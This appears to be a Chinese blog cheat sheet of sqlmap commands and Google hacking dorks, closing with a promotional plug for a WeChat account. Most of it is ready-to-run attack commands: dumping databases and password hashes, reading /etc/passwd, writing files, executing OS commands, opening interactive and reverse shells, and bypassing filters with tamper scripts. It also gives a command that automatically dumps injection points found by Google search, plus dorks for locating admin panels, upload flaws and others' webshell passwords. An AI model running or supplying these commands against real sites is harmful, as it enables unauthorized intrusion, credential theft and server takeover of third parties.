# SQLMap的用法+谷歌黑客语法

# SQLMap的用法记录

基本步骤

sqlmap.py -u "http://192.168.109.139/news?id=1" --current-user #获取当前用户名称
sqlmap.py -u "http://192.168.109.139/news?id=1" --current-db #获取当前数据库名称
sqlmap.py -u "http://192.168.109.139/news?id=1" --tables -D "db_name" #列表名
sqlmap.py -u "http://192.168.109.139/news?id=1" --columns -T "tablename" users-D "db_name" -v 0 #列字段
sqlmap.py -u "http://192.168.109.139/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0 #获取字段内容
******************信息获取****************** 
sqlmap.py -u "http://192.168.109.139/news?id=1" --smart --level 3 --users # smart 智能 level 执行测试等级
sqlmap.py -u "http://192.168.109.139/news?id=1" --dbms "Mysql" --users # dbms 指定数据库类型
sqlmap.py -u "http://192.168.109.139/news?id=1" --users #列数据库用户
sqlmap.py -u "http://192.168.109.139/news?id=1" --dbs#列数据库
sqlmap.py -u "http://192.168.109.139/news?id=1" --passwords #数据库用户密码
sqlmap.py -u "http://192.168.109.139/news?id=1" --passwords-U root -v 0 #列出指定用户数据库密码
sqlmap.py -u "http://192.168.109.139/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20 #列出指定字段,列出 20 条
sqlmap.py -u "http://192.168.109.139/news?id=1" --dump-all -v 0 #列出所有数据库所有表
sqlmap.py -u "http://192.168.109.139/news?id=1" --privileges #查看权限
sqlmap.py -u "http://192.168.109.139/news?id=1" --privileges -U root #查看指定用户权限
sqlmap.py -u "http://192.168.109.139/news?id=1" --is-dba -v 1 #是否是数据库管理员
sqlmap.py -u "http://192.168.109.139/news?id=1" --roles #枚举数据库用户角色
sqlmap.py -u "http://192.168.109.139/news?id=1" --udf-inject #导入用户自定义函数(获取系统权限!)
sqlmap.py -u "http://192.168.109.139/news?id=1" --dump-all --exclude-sysdbs -v 0 #列出当前库所有表
sqlmap.py -u "http://192.168.109.139/news?id=1" --union-cols #union 查询表记录
sqlmap.py -u "http://192.168.109.139/news?id=1" --cookie "COOKIE_VALUE" #cookie 注入
sqlmap.py -u "http://192.168.109.139/news?id=1" -b #获取 banner 信息
sqlmap.py -u "http://192.168.109.139/news?id=1" --data "id=3" #post 注入
sqlmap.py -u "http://192.168.109.139/news?id=1" -v 1 -f #指纹判别数据库类型
sqlmap.py -u "http://192.168.109.139/news?id=1" --proxy"http://127.0.0.1:8118" #代理注入
sqlmap.py -u "http://192.168.109.139/news?id=1"--string"STRING_ON_TRUE_PAGE" #指定关键词
sqlmap.py -u "http://192.168.109.139/news?id=1" --sql-shell #执行指定 sql 命令
sqlmap.py -u "http://192.168.109.139/news?id=1" --file /etc/passwd  #必须为dbs权限
sqlmap.py -u "http://192.168.109.139/news?id=1" --file-write 本地文件路径 file-dest 目标路径  #必须为dbs权限(可将本地的某个文件写入到目标路径下)
sqlmap.py -u "http://192.168.109.139/news?id=1" --os-cmd=whoami #执行系统命令
sqlmap.py -u "http://192.168.109.139/news?id=1" --os-shell #系统交互 shell
sqlmap.py -u "http://192.168.109.139/news?id=1" --os-pwn #反弹 shell
sqlmap.py -u "http://192.168.109.139/news?id=1" --reg-read #读取 win 系统注册表
sqlmap.py -u "http://192.168.109.139/news?id=1" --dbs-o "sqlmap.log" #保存进度
sqlmap.py -u "http://192.168.109.139/news?id=1" --dbs -o "sqlmap.log" --resume #恢复已保存进度
sqlmap.py -u "http://192.168.109.139/news?id=1" --msf-path=/opt/metasploit3/msf2 --os-pwn 反弹 shell 需 metasploit 路径
sqlmap.py -u "http://192.168.109.139/news?id=1" --tamper "base64encode.py" 加载脚本(可利用绕过注入限制)
sqlmap.py -u "http://192.168.109.139/news?id=1" --batch --tamper "base64encode.py" 加载脚本(可利用绕过注入限制)
sqlmap -g "google 语法" --dump-all --batch #google 搜索注入点自动 跑出所有字段
sqlmap.py -u "http://192.168.109.139/news?id=1" --forms  #post提交方式注入
sqlmap.py -r 本地数据包路径 #post提交方式注入
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

# 攻击实例

sqlmap.py -u "http://192.168.109.139/news?id=1&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --password
1

谷歌黑客语法

  • site:可以限制你搜索范围的域名.

  • inurl:用于搜索网页上包含的URL,这个语法对寻找网页上的搜索,帮助之类的很有用.

  • intext: 只搜索网页

    部分中包含的文字(也就是忽略了标题、URL等的文字)

  • intitle: 查包含关键词的页面,一般用于社工别人的webshell密码

  • filetype:搜索文件的后缀或者扩展名

  • intitle:限制搜索的网页标题.

  • link: 可以得到一个所有包含了某个指定URL的页面列表.

  • 查找后台地址:site:域名 inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms

  • 查找文本内容:site:域名 intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|admin|login|sys|managetem|password|username

  • 查找可注入点:site:域名 inurl:aspx|jsp|php|asp

  • 查找上传漏洞:site:域名 inurl:file|load|editor|Files

  • 找eweb编辑器:site:域名 inurl:ewebeditor|editor|uploadfile|eweb|edit

  • 存在的数据库:site:域名 filetype:mdb|asp|#

  • 查看脚本类型:site:域名 filetype:asp/aspx/php/jsp

  • 迂回策略入侵:inurl:cms/data/templates/images/index/

# 写在最后

如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!